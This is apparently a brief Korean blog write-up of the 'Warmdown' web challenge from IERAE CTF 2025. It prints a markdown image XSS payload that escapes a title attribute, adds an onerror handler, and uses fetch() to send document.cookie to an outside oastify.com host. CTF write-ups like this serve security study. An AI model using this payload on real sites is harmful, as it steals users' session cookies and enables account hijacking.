본문 바로가기

IERAE CTF 2025-web-풀이

Warmdown

![](x+"title\"onerror=\"fetch('http://havxgubljauhiefjnaf11gknhen5bxzm.oastify.com/steal?cookie='+document.cookie)\"")

markdown을 이용한 xss요청 하면 해결(\"을 이용해서 우회, 마크다운상에선 \"로 처리되고 html상으론 "으로 처리)

 

'' 카테고리의 다른 글

smileyCTF-web-공부  (1) 2025.06.19
smileyCTF-web-풀이  (1) 2025.06.14
N0PSctf-web-공부  (1) 2025.06.04
Breach CTF-web-Framework Follies  (0) 2025.04.11
nodejs로 파일 업로드 필터링 우회 방법  (0) 2025.04.09